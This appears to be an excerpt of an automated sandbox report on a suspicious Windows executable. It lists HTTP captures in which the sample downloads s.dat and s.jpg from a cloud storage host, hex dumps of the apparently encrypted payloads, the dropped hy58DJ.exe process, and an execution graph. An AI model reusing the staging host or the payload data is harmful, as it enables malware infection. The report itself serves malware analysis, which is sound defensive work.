                                    2025-01-09 00:47:29 UTC4096INData Raw: 82 6b 24 f1 76 c7 84 af a6 d8 72 87 9e 02 98 c2 20 b2 f1 7e 40 de 11 c4 b7 04 70 3b 4c f8 6d db 2d a9 ce 60 f5 10 4c 12 54 c5 c0 72 2e a1 d8 20 3a 3e 2a 25 eb 4b 0d 65 55 1a c4 48 1a 5e 6a 05 eb 8f 85 11 75 4e 9c 4d 91 ea 1e 6c 58 58 23 d5 a9 a7 43 0b 1c de b1 07 fa 5d 5e fb 87 19 ab 0f 82 15 1e ba 6f f1 63 c6 da 5d 0e ab af 31 1b bf 5a cd f6 53 1f 80 ab 2c 54 0f 0f 1b 81 1b a2 ce 13 0d 34 7e c8 33 6a cb 2c 24 f8 95 15 fe 8e 9d b5 5f fa 6f 6b 71 de 1e b5 8b 59 19 1d 09 5e ac 7c 16 63 9b d8 c8 b4 27 9d 9d bb 43 03 b0 6a a2 cc 20 6c 87 15 fd 83 53 0b 74 ba be 94 f4 dc 67 c5 f1 cb 96 3f f5 5d c0 5a b8 19 35 ae dd 45 b8 22 e8 49 6d f7 25 8d 40 da 70 d0 35 af 4d f4 b8 23 50 f0 45 df 6d c4 90 0a 98 39 7d 78 78 2e 64 92 61 cf c0 27 77 aa e9 3f f8 8d 38 ff 14 79
                                    Data Ascii: k$vr ~@p;Lm-`LTr. :>*%KeUH^juNMlXX#C]^oc]1ZS,T4~3j,$_okqY^|c'Cj lStg?]Z5E"Im%@p5M#PEm9}xx.da'w?8y
                                    2025-01-09 00:47:29 UTC4096INData Raw: 7d 65 0f 82 22 33 6c 58 70 0d b8 a6 df ea 7b 6d 7a 5f 99 fd 73 8d 00 c9 26 96 32 5f 9a 2d 5f 52 cd c3 af 35 d2 10 ab ac 7d 75 1f 92 32 53 12 21 c0 0e a8 ca d8 dd c7 d0 35 03 63 e9 2c 3e eb 04 88 24 5d 20 1c fa f5 63 e0 67 b3 2a db a8 82 4f 91 91 6e 78 3a 77 32 95 d2 d2 f3 31 f7 3a 09 7f 6b 09 80 20 ed f3 ca fa b6 ca 1e 07 6f f1 ea 8e 7e 4f df f1 ee 66 ca 0f a7 51 14 14 36 25 dc 96 50 91 b0 60 93 09 88 28 f5 58 20 ee bf f1 ff 75 17 d6 a0 c8 e1 27 4f 1e 06 29 03 1c 90 34 5d e2 3e e3 1d 28 c6 67 37 ac 93 2b e2 78 8e 2e d7 4d 83 2a 0a 90 3e 9f 8f 15 a3 7a 0a 90 76 d6 47 dd 4b e2 82 19 56 f6 3f ee a6 6f 8c 4a 79 5f df 1d 79 90 90 40 b3 29 a8 08 35 66 cc 97 f8 29 cb b8 4b 89 f7 f9 13 42 7a ec 0b d1 0c f7 79 ec 74 3d d3 55 25 47 d7 82 00 94 7d a5 84 da b6 7d d4
                                    Data Ascii: }e"3lXp{mz_s&2_-_R5}u2S!5c,>$] cg*Onx:w21:k o~OfQ6%P`(X u'O)4]>(g7+x.M*>zvGKV?oJy_y@)5f)KBzyt=U%G}}
                                    2025-01-09 00:47:29 UTC4096INData Raw: e8 d2 e7 86 d8 b8 2d 86 04 1b e1 8b 98 09 7a 3b fe 9c 4d 52 15 f8 12 ed 29 9d a8 0f 40 e6 e5 0b eb ad 15 c7 ff 17 26 89 1c e1 b5 91 c7 16 33 50 17 9c 37 41 d3 06 73 61 28 5f ab 72 93 98 00 8a 6a 27 25 8b 41 b0 e7 2a 40 2e 6b be e6 f0 18 0c d2 28 51 ab 0c 08 02 67 5f 1a 0c 87 3a cc d9 74 dd c0 fd 7b 99 48 59 37 8d c3 26 3f 4d cf ea ea 8f 47 36 91 83 9c f4 2f 52 87 f9 10 b6 44 68 27 93 d2 36 2f 5d 2c 59 59 de 90 b4 e8 85 d4 e9 71 8f 42 65 b0 d8 16 f6 ff 1e 3b 4d 23 fa 1f 9e 5f 66 d6 96 8f 3f 35 40 28 de 44 3a fe c4 20 45 37 b3 18 0e ff ad 2b a7 83 7e 88 3a 6c b9 b9 31 4d dd 30 2d 5f e5 98 94 26 e7 f1 17 4f ba 13 8e 17 f2 ca 4c 08 6f 8e 74 4a 05 8d c4 24 3d 4b fb 22 c3 67 31 f6 85 11 26 a8 6e cf 31 7a 78 b7 f3 05 66 c0 b6 4d c3 3a 0e 1c bb 55 6d 30 27 5a a7
                                    Data Ascii: -z;MR)@&3P7Asa(_rj'%A*@.k(Qg_:t{HY7&?MG6/RDh'6/],YYqBe;M#_f?5@(D: E7+~:l1M0-_&OLotJ$=K"g1&n1zxfM:Um0'Z
                                    2025-01-09 00:47:29 UTC4096INData Raw: ed 6d 99 07 e4 c7 b2 15 b2 42 6c 84 38 c1 7d 64 0c 9a 79 ff 71 01 27 59 e8 ac 0f 20 7d b1 81 7f 87 9c 7d 37 13 a4 d8 58 fb d7 aa 0d 1a 88 06 95 72 33 fc a9 08 eb 61 e5 1b 19 63 d2 aa 09 e2 b9 52 e1 a4 8a 08 e0 3b 67 e2 cf e9 55 97 b7 28 79 76 3f a4 7b d0 9c 14 c0 80 dc ab f5 4d 7c f8 cf 89 4a 4c ec 7a 99 13 8b 9f bf 89 fd cb 07 5c 57 9b f8 f0 51 1b 72 ea b3 52 b0 4e d4 50 16 0e f6 43 a8 45 5e f8 99 90 3e a9 4a 8f 23 54 4d 98 d2 f6 51 e0 54 ce c8 f3 3b ec 5d 4b 96 31 6f 39 fe 82 8b 66 a4 22 6a 74 1d 57 6f 34 15 b0 16 87 b1 79 02 74 8a 6e 8c ba ef c4 ed 35 cc c8 82 2e 56 35 d3 9b 89 05 6d 16 f0 98 8a 0e 66 25 2b c7 a1 c9 f5 3e b0 50 22 fe a6 40 5f f9 be 1c 04 3a 5e 6a f5 4b 68 7a cb ed b4 ba f8 98 a8 7f 86 9c b5 87 da e8 1e 72 b0 c5 a5 2a a9 48 4a cf 41 64
                                    Data Ascii: mBl8}dyq'Y }}7Xr3acR;gU(yv?{M|JLz\WQrRNPCE^>J#TMQT;]K1o9f"jtWo4ytn5.V5mf%+>P"@_:^jKhzr*HJAd


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    5192.168.2.45049359.110.190.444435956C:\Users\user\Desktop\2o63254452-763487230.06.exe
                                    TimestampBytes transferredDirectionData
                                    2025-01-09 00:47:37 UTC111OUTGET /s.dat HTTP/1.1
                                    User-Agent: GetData
                                    Host: a8mw1y.oss-cn-beijing.aliyuncs.com
                                    Cache-Control: no-cache
                                    2025-01-09 00:47:37 UTC560INHTTP/1.1 200 OK
                                    Server: AliyunOSS
                                    Date: Thu, 09 Jan 2025 00:47:37 GMT
                                    Content-Type: application/octet-stream
                                    Content-Length: 28272
                                    Connection: close
                                    x-oss-request-id: 677F1CA9AF1C2D30304D54DD
                                    Accept-Ranges: bytes
                                    ETag: "E4C4E6A73941679BB48215B597159789"
                                    Last-Modified: Thu, 09 Jan 2025 00:47:29 GMT
                                    x-oss-object-type: Normal
                                    x-oss-hash-crc64ecma: 3255300209940473843
                                    x-oss-storage-class: Standard
                                    x-oss-ec: 0048-00000113
                                    Content-Disposition: attachment
                                    x-oss-force-download: true
                                    Content-MD5: 5MTmpzlBZ5u0ghW1lxWXiQ==
                                    x-oss-server-time: 15
                                    2025-01-09 00:47:37 UTC3536INData Raw: f5 e2 28 b8 bb b8 b8 b8 bc b8 b8 b8 47 47 b8 b8 00 b8 b8 b8 b8 b8 b8 b8 f8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 50 b8 b8 b8 b6 a7 02 b6 b6 02 bf 7b 5a c3 7a 37 fa 16 63 5f 36 2c 7f 2f 5d 40 48 5d 3c 30 7d 3e 5f 50 50 51 25 71 33 34 14 46 41 5a 7a 33 34 7a 3e 35 29 5a 37 35 3e 3f 11 32 32 35 11 35 35 35 35 35 35 35 f6 81 47 5c db 89 40 66 e1 b3 7a 5c db 89 40 66 e1 b3 7b 5c e4 89 40 66 e8 cb e9 5c d8 89 40 66 e8 cb ef 5c d8 89 40 66 e8 cb f9 5c df 89 40 66 e8 cb f0 5c d5 89 40 66 e8 cb ee 5c da 89 40 66 e8 cb eb 5c da 89 40 66 34 0f 05 0e 89 db 12 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 64 71 34 34 50 b2 3c 34 c2 67 ad 62 62 62 62 62 62 62 62 62 92 62 40
                                    Data Ascii: (GGP{Zz7c_6,/]@H]<0}>_PPQ%q34FAZz34z>5)Z75>?2255555555G\@fz\@f{\@f\@f\@f\@f\@f\@f\@f44444444444444444444444444dq44P<4gbbbbbbbbbb@
                                    2025-01-09 00:47:37 UTC4096INData Raw: 5f 05 23 23 56 27 a8 d8 33 c7 9d eb 2b a7 66 a7 83 f7 ef 2a 7e 0e 7a 6b e6 23 60 e2 be c6 b2 1d 08 46 3b 1d 1d 96 61 39 69 71 02 d2 a7 c2 59 15 5c 9c 11 31 89 34 31 31 b1 d8 bd 31 31 31 75 0a e5 79 0d b1 b4 b1 b1 31 da 49 d9 4c 5a 4c 4c 04 8f f4 4c 3f fc 4a 38 87 86 87 87 47 ac 2b 0a cc 09 ff 1e 84 0f 49 6c b1 90 b1 b1 f5 7e eb b1 7e 8d 3a f7 23 23 1a 3d 55 1c 1d d6 90 84 dc 1d fe de b7 75 bb 43 f3 36 f6 f4 bf 7b a3 b3 eb 2a e6 12 a7 6d a3 a3 e2 1b a3 a2 a3 a3 2a 6f d6 6b 25 92 60 2b 43 ca 06 43 ab 0f b6 ab ab ea 54 6d e2 63 27 ca e3 e3 e3 ab 62 a7 72 63 62 62 26 59 54 26 eb df 9b 10 58 d2 12 1e 36 5a 99 c5 bd c1 d1 5a bd f5 b1 f9 32 75 91 d0 cf d0 cc 8d 90 93 92 51 5e 5e 5e 92 92 92 92 da 19 56 da 53 82 d2 92 1b fa 82 da 53 aa c2 92 1b ea b2 d3 87 92 86
                                    Data Ascii: _##V'3+f*~zk#`F;a9iqY\1411111uy1ILZLLL?J8G+Il~~:##=UuC6{*m*ok%`+CCTmc'brcbb&YT&X6ZZ2uQ^^^VSS
                                    2025-01-09 00:47:37 UTC4096INData Raw: 07 0a aa de df de de 96 1b c2 b2 b2 fa 3f fe 96 b6 d3 a5 5f 1a 6c 9f 6c b7 ab 28 48 78 54 49 48 48 b7 5d e9 fe e9 e9 a1 2c ed 85 91 6e 84 1f 86 86 86 0d c2 e6 f6 86 4f 14 4e cc b7 b2 c2 9e 3c 78 18 04 bf 47 bd ca b7 3a ef b6 5e d1 5e 5e 5e 1f 65 9d 2b 21 90 29 2b 2b 2b c2 ab ab ab ab 90 53 e5 ec d1 5a 0a 3a a6 25 5e a0 d3 84 58 97 f7 cf b6 cc 34 41 24 70 0c 90 28 46 0d 0d 0d 02 98 5b 1b 5b 9e 75 c7 a5 5d 28 4d 19 65 f9 41 2f 64 64 64 6b f1 32 72 32 f5 1e b0 76 0d 0f 78 1d 49 71 d5 6d 03 02 03 03 0c 99 cf 8f cf c7 24 ff 4c b4 4f 39 67 23 5f fb 43 09 42 43 43 4c d6 80 c0 03 ca 2b db 58 23 d1 ae b8 97 f2 8a b2 ff 9a ce f6 52 ea 84 85 84 84 3c 30 3c 3c 3c 33 78 e4 7d 56 a6 09 4a 0b 61 91 3e 15 7f 15 e5 91 fa a4 ce 15 ba ef 8f a4 54 fb 93 d2 b8 48 e7 ee a6 dc
                                    Data Ascii: ?_ll(HxTIHH],nON<xG:^^^^e+!)+++SZ:%^X4A$p(F[[u](MeA/dddk2r2vxIqm$LO9g#_CBCCL+X#R<0<<<3x}VJa>TH
                                    2025-01-09 00:47:37 UTC4096INData Raw: 30 4a 59 ce 0f c9 ba f8 0e 39 f9 8c 87 c4 73 45 cf 41 4f 0c f3 c4 84 0d fb cc 0f 79 76 31 fa 90 92 f6 1b 94 9e dd 17 7c 7e 1a f5 7d 8b bc 79 09 04 41 8a e0 e4 6b e4 ea a3 69 02 ee 67 ef a3 65 ad 2c a4 8c 89 f9 dc c1 4a 09 88 00 e9 03 74 14 5c 97 fd 1c 54 97 18 16 5f e9 df 5e d7 5f 2b ae e7 2d 4e a9 e4 2c 69 dc db 95 57 1f dc 10 00 1f 57 e0 d6 95 91 9f dc 6a a2 e2 6b 1f ec 56 94 dc 1f ba ba ba dc dc dc dc d3 c3 58 dc dc dc dc dc ba ba ba 4c 2a 2a dc 05 84 fc 05 25 25 25 56 67 2f ec 23 6d 95 21 e6 39 33 c9 71 ba 53 9a f2 33 72 2b 7f ba eb aa f2 31 75 3b 39 7d f6 69 77 34 cb fd 7c bd fc b5 f1 34 25 41 e1 7d fe 9d 62 94 e7 6b 6b 6b 0d 0d 0d 0d 02 12 89 0d 0d 0d 0d 0d 6b 9d 45 8c 76 8c 7c 73 8c 04 c6 cb eb cb cb cb 83 4a 22 4b 4b 4b 4b 44 5c 40 4e 4b 53 0f 41
                                    Data Ascii: 0JY9sEAOyv1|~}yAkige,Jt\T_^_+-N,iWWjkVXL**%%%Vg/#m!93qS3r+1u;9}iw4|4%A}bkkkkEv|sJ"KKKKD\@NKSA
                                    2025-01-09 00:47:38 UTC4096INData Raw: 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 68 7b 60 ab 47 9b e3 20 f9 68 ad 35 1d 35 35 35 7d b8 79 11 31 ee 04 f4 3b 0b 0b bc 31 f0 98 9c 63 89 4e 53 ac ac 1b d8 93 d0 27 cd 15 02 32 32 7a b1 f6 02 59 c1 ce ce 92 ce 8a ce a1 ce bd ce 8a ce ab ce b8 ce a7 ce ad ce ab ce bd ce 92 ce 9a ce bc ce bb ce ab ce 9d ce a7 ce a9 ce a6 ce ba ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce
                                    Data Ascii: ((((((((((((((((((((((((((((((((((((((((((((((((((((((((h{`G h5555}y1;1cNS'22zY
                                    2025-01-09 00:47:38 UTC4096INData Raw: ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad fd ad ad e9 ad ad ad bd 0c b5 0c 2c ad 24 ad 9d 0c 95 0c 4c ad 44 ad fd 0c f5 0c 6c ad 64 ad dd 0c d5 0c 8c ad 84 ad 3d 0c 35 0c ac ad a4 ad 1d 0c 15 0c cc ad c4 ad 7d 0c 75 0c ec ad e4 ad 5d 0c 55 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c
                                    Data Ascii: ,$LDld=5}u]U
                                    2025-01-09 00:47:38 UTC4096INData Raw: 47 a9 09 fd fc 12 13 1d 3c 88 0c c6 10 da 45 42 60 a9 c1 bc 1a 11 a7 e0 2e 22 2b 0a 8c d8 4c df a8 56 70 b6 bc 66 f5 56 67 09 82 f2 d3 a3 55 15 ce e3 6f 81 d8 c2 03 30 7c 10 15 ac 5c 86 7e 88 07 1f ba 3a fb b8 4b 9a 62 ec 00 e7 8e 85 12 6b 82 15 59 35 78 08 43 90 93 b7 4d 24 38 15 5e 33 ae 0e 03 b1 b4 8a 81 33 30 10 93 30 32 31 32 32 38 53 12 7f cb 7f 7f 7f 7f 7f 58 4f 42 49 46 65 e3 2d e3 92 9f 93 93 97 92 97 a7 e8 d9 e3 d8 e1 e7 e2 b4 e5 e3 f6 e7 b0 e3 81 a3 80 91 86 83 d5 d1 dd c6 df 88 be ac b7 de d9 d0 c3 ac ad f2 d3 e3 dd d5 d0 85 d4 d7 c3 c4 91 a6 a7 ca c8 c9 c3 f2 dd f3 df d9 dc 8a db d1 c8 ce 96 ff f5 e4 f9 8a 96 9f 8d ad ce e2 ff 8f 90 8d 9e ea f7 f1 f0 c1 d9 c0 d7 d1 d4 82 d3 d0 c0 f3 9e f7 fd ec f1 82 9e 97 85 a5 c6 ea e1 84 c1 b7 84 f6 ed e2
                                    Data Ascii: G<EB`."+LVpfVgUo0|\~:KbkY5xCM$8^330021228SXOBIFe-
                                    2025-01-09 00:47:38 UTC160INData Raw: bc 56 8d a1 48 a7 d8 db 20 3c c6 64 eb a7 f5 dc 87 01 85 4d b3 73 df 7e 2f 72 c3 fe 90 7f 53 03 95 c3 69 b4 78 70 7f 47 cd 54 d7 16 ca e8 7a 26 d7 20 64 6e df e5 43 1a 7a 90 7c ad 5f 36 aa 81 b5 fe 6e b2 cd cf ba 1d 41 b4 54 53 e9 3f 79 f1 5e 23 29 65 39 09 a1 03 8d 0a fe 23 25 a7 5c cd 0e 5d 86 0a 45 0c 38 50 e4 30 db dd d2 af bb de fa 16 60 6f 98 ea 3b 50 91 e8 7f a4 41 45 cc 50 fe 5e b5 e2 5c 31 55 2a 67 69 1d 23 55 9c 19 fe aa 01 a8 35 68 df e2 53 d9 70 80 53 70 93 2a 5c
                                    Data Ascii: VH <dMs~/rSixpGTz& dnCz|_6nATS?y^#)e9#%\]E8P0`o;PAEP^\1U*gi#U5hSpSp*\


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    6192.168.2.45050659.110.190.444435956C:\Users\user\Desktop\2o63254452-763487230.06.exe
                                    TimestampBytes transferredDirectionData
                                    2025-01-09 00:47:39 UTC111OUTGET /s.jpg HTTP/1.1
                                    User-Agent: GetData
                                    Host: a8mw1y.oss-cn-beijing.aliyuncs.com
                                    Cache-Control: no-cache
                                    2025-01-09 00:47:39 UTC543INHTTP/1.1 200 OK
                                    Server: AliyunOSS
                                    Date: Thu, 09 Jan 2025 00:47:39 GMT
                                    Content-Type: image/jpeg
                                    Content-Length: 8299
                                    Connection: close
                                    x-oss-request-id: 677F1CAB998B3E3332F42F19
                                    Accept-Ranges: bytes
                                    ETag: "9BDB6A4AF681470B85A3D46AF5A4F2A7"
                                    Last-Modified: Wed, 08 Jan 2025 11:04:15 GMT
                                    x-oss-object-type: Normal
                                    x-oss-hash-crc64ecma: 692387538176721524
                                    x-oss-storage-class: Standard
                                    x-oss-ec: 0048-00000104
                                    Content-Disposition: attachment
                                    x-oss-force-download: true
                                    Content-MD5: m9tqSvaBRwuFo9Rq9aTypw==
                                    x-oss-server-time: 1
                                    2025-01-09 00:47:39 UTC3553INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 90 00 90 00 00 ff e1 00 5a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 05 03 01 00 05 00 00 00 01 00 00 00 4a 03 03 00 01 00 00 00 01 00 00 00 00 51 10 00 01 00 00 00 01 01 00 00 00 51 11 00 04 00 00 00 01 00 00 16 25 51 12 00 04 00 00 00 01 00 00 16 25 00 00 00 00 00 01 86 a0 00 00 b1 8f ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08
                                    Data Ascii: JFIFZExifMM*JQQ%Q%CC
                                    2025-01-09 00:47:39 UTC4096INData Raw: 6a 97 a0 76 9f 8a 4c ce c2 04 d4 99 b6 a3 2e 14 ad df 13 51 65 93 89 43 91 9f a1 22 66 8b 67 93 6a a2 a8 41 af 7a 2c ae 4c aa 83 63 3f 31 b1 0c 38 b2 5a bc ee 9f ac 38 b8 3b d8 89 02 c6 e4 8d 4f 83 68 c8 cb e9 cd 46 82 eb f8 de 65 da d0 b3 5f 34 d9 d6 6d db 55 d9 bc fb a3 e2 61 23 e6 e4 e3 87 ec ad ee cf c4 48 ef c7 73 cd d6 f3 c4 81 f4 1c 39 58 f8 db f6 39 e6 54 8a 0c ef 0e 3c c4 02 47 ce 01 4a eb 07 3d 8b cf 64 01 b1 11 50 1f 56 fc 58 fd 52 90 48 39 56 7e 31 61 02 cb 69 da d9 d8 cc 26 ee 13 ab 4c 25 c9 2d d0 31 03 dc f8 c8 d7 3b 32 53 27 d0 3e e3 d2 43 01 15 0b c5 c7 aa 26 cf 01 8d 0f 68 05 6c 61 40 dc 57 84 5a 54 79 13 7c 39 5f 3b 5d be 3a 5e 38 29 ef 27 40 e5 0e 2f e3 91 59 ab d5 8c 1a 9b 83 db 73 71 24 d7 68 16 7f 18 08 bb 51 3d 32 5b d8 c4 b1 43 a5
                                    Data Ascii: jvL.QeC"fgjAz,Lc?18Z8;OhFe_4mUa#Hs9X9T<GJ=dPVXRH9V~1ai&L%-1;2S'>C&hla@WZTy|9_;]:^8)'@/Ysq$hQ=2[C
                                    2025-01-09 00:47:39 UTC650INData Raw: f2 f5 18 89 8e 8a db 3d b5 89 92 61 93 d9 95 d6 f9 fa e8 f6 8e e8 f9 2d 9f 8a 17 a0 e4 d1 c1 a0 b7 a6 2d 71 ae f8 c9 d9 ef da b0 c5 da fa da d3 d9 f2 c0 b8 ea 98 18 bd f0 db b2 82 ae c3 ad a0 a8 b3 8b a8 a6 a7 8d 1d d0 9d 80 92 80 87 97 c7 d6 97 a8 da 92 be bd ad bf db e0 e5 e2 8f 56 e5 a7 8b 84 86 89 eb ec 39 ec a8 95 85 a2 81 d4 9a 95 92 8b 8a ab fa fc fd fe b4 45 53 4c 46 48 36 34 f8 7b 0a 05 0b 03 0d 01 0f 1f 11 1d 13 1b 15 19 17 e7 16 1a 14 1c 12 1e 10 20 2e 22 2c 24 2a 26 28 28 d6 25 2b 23 2d 21 2f 3f 31 3d 33 3b 35 39 37 37 39 3a 3b 3c f6 8f 1f 40 51 42 43 63 45 76 3f 0a e1 4a 4b 7c 4d 3e 1b 54 09 32 53 6c 7f 97 57 40 d9 5a 77 8c 5d 42 42 71 c9 62 63 ec 65 4a 47 68 75 52 6b 60 38 6f e3 30 71 6e 2b 70 63 16 77 76 2e 4a 69 7c 7d ee 7e 96 81 8c 84 90
                                    Data Ascii: =a--qV9ESLFH64{ .",$*&((%+#-!/?1=3;59779:;<@QBCcEv?JK|M>T2SlW@Zw]BBqbceJGhuRk`8o0qn+pcwv.Ji|}~


                                    Click to jump to process

                                    Click to jump to process

                                    Click to dive into process behavior distribution

                                    Click to jump to process

                                    Target ID:0
                                    Start time:19:45:57
                                    Start date:08/01/2025
                                    Path:C:\Users\user\Desktop\2o63254452-763487230.06.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Users\user\Desktop\2o63254452-763487230.06.exe"
                                    Imagebase:0x140000000
                                    File size:30'965'248 bytes
                                    MD5 hash:0C3951CFE848EAD37F11600EE5195006
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:low
                                    Has exited:true

                                    Target ID:5
                                    Start time:19:47:38
                                    Start date:08/01/2025
                                    Path:C:\Users\user\Documents\hy58DJ.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Users\user\Documents\hy58DJ.exe
                                    Imagebase:0x140000000
                                    File size:133'136 bytes
                                    MD5 hash:D3709B25AFD8AC9B63CBD4E1E1D962B9
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Antivirus matches:
                                    • Detection: 0%, ReversingLabs
                                    Reputation:moderate
                                    Has exited:true

                                    Target ID:6
                                    Start time:19:48:01
                                    Start date:08/01/2025
                                    Path:C:\Users\user\Documents\hy58DJ.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Users\user\Documents\hy58DJ.exe
                                    Imagebase:0x140000000
                                    File size:133'136 bytes
                                    MD5 hash:D3709B25AFD8AC9B63CBD4E1E1D962B9
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate
                                    Has exited:false

                                    Reset < >

                                      Execution Graph

                                      Execution Coverage:2.1%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:32%
                                      Total number of Nodes:462
                                      Total number of Limit Nodes:7
                                      execution_graph 13939 140005df3 13940 140005e71 13939->13940 13941 140005e84 CreateFileA 13940->13941 13942 140005f50 __CxxFrameHandler 13941->13942 13943 140005fc3 malloc ReadFile 13942->13943 16574 7ffe1a4511b0 16583 7ffe1a451209 16574->16583 16575 7ffe1a451b90 51 API calls 16592 7ffe1a451300 BuildCatchObjectHelperInternal 16575->16592 16576 7ffe1a4514f0 16607 7ffe1a451a40 16576->16607 16577 7ffe1a451b70 _log10_special 8 API calls 16581 7ffe1a4514d3 16577->16581 16579 7ffe1a45129e 16584 7ffe1a4514f6 16579->16584 16593 7ffe1a451b90 16579->16593 16580 7ffe1a4512c7 16582 7ffe1a451b90 51 API calls 16580->16582 16585 7ffe1a4512b9 BuildCatchObjectHelperInternal 16582->16585 16583->16576 16583->16579 16583->16580 16583->16585 16583->16592 16610 7ffe1a451110 16584->16610 16585->16575 16590 7ffe1a4514eb 16602 7ffe1a4579cc 16590->16602 16592->16577 16595 7ffe1a451b9b 16593->16595 16594 7ffe1a4512b0 16594->16585 16594->16590 16595->16594 16596 7ffe1a457a4c BuildCatchObjectHelperInternal 2 API calls 16595->16596 16597 7ffe1a451bba 16595->16597 16596->16595 16600 7ffe1a451bc5 16597->16600 16616 7ffe1a4521f0 16597->16616 16599 7ffe1a451110 Concurrency::cancel_current_task 51 API calls 16601 7ffe1a451bcb 16599->16601 16600->16599 16603 7ffe1a457844 _invalid_parameter_noinfo_noreturn 47 API calls 16602->16603 16604 7ffe1a4579e5 16603->16604 16605 7ffe1a4579fc _invalid_parameter_noinfo_noreturn 17 API calls 16604->16605 16606 7ffe1a4579fa 16605->16606 16620 7ffe1a451b34 16607->16620 16611 7ffe1a45111e Concurrency::cancel_current_task 16610->16611 16612 7ffe1a453990 Concurrency::cancel_current_task 2 API calls 16611->16612 16613 7ffe1a45112f 16612->16613 16614 7ffe1a45379c __std_exception_copy 49 API calls 16613->16614 16615 7ffe1a451159 16614->16615 16617 7ffe1a4521fe Concurrency::cancel_current_task 16616->16617 16618 7ffe1a453990 Concurrency::cancel_current_task 2 API calls 16617->16618 16619 7ffe1a45220f 16618->16619 16625 7ffe1a451ab0 16620->16625 16623 7ffe1a453990 Concurrency::cancel_current_task 2 API calls 16624 7ffe1a451b56 16623->16624 16626 7ffe1a45379c __std_exception_copy 49 API calls 16625->16626 16627 7ffe1a451ae4 16626->16627 16627->16623 15119 140007412 15121 140007333 15119->15121 15120 1400073e0 LdrLoadDll 15120->15121 15121->15120 15122 140007403 15121->15122 15527 140013670 InitializeCriticalSection CreateEventW CreateEventW CreateEventW 15530 1400054e0 15527->15530 15529 1400136ef 15531 14000552c 15530->15531 15534 140005506 _lock 15530->15534 15532 1400074d0 LdrLoadDll 15531->15532 15533 140005536 15532->15533 15535 140008370 3 API calls 15533->15535 15534->15529 15539 140005545 __CxxFrameHandler 15535->15539 15536 1400055b8 15537 140008de0 _lock 2 API calls 15536->15537 15538 1400055c0 sprintf_s 15537->15538 15538->15534 15539->15536 15540 1400074f0 LdrLoadDll 15539->15540 15541 140005561 CreateThread 15540->15541 15541->15538 15542 1400055b0 GetLastError 15541->15542 15542->15536 13948 140005a70 GetStartupInfoW GetProcessHeap HeapAlloc 13949 140005ab1 13948->13949 13950 140005add GetVersionExA 13948->13950 13951 140005abf 13949->13951 13998 140009540 13949->13998 13952 140005b0e GetProcessHeap HeapFree 13950->13952 13953 140005af0 GetProcessHeap HeapFree 13950->13953 14006 140009300 13951->14006 13958 140005b3c 13952->13958 13954 140005d0b 13953->13954 13957 140005ac9 14017 140008510 GetModuleHandleA 13957->14017 14021 14000a310 HeapCreate 13958->14021 13961 140005bec 13962 140005c12 13961->13962 13963 140005bf0 13961->13963 13967 140005c17 13962->13967 13964 140005bfe 13963->13964 13965 140009540 _lock 12 API calls 13963->13965 13966 140009300 _lock 10 API calls 13964->13966 13965->13964 13968 140005c08 13966->13968 13969 140005c3d 13967->13969 13971 140005c29 13967->13971 13972 140009540 _lock 12 API calls 13967->13972 13970 140008510 _lock 3 API calls 13968->13970 14024 140009f50 GetStartupInfoA 13969->14024 13970->13962 13973 140009300 _lock 10 API calls 13971->13973 13972->13971 13975 140005c33 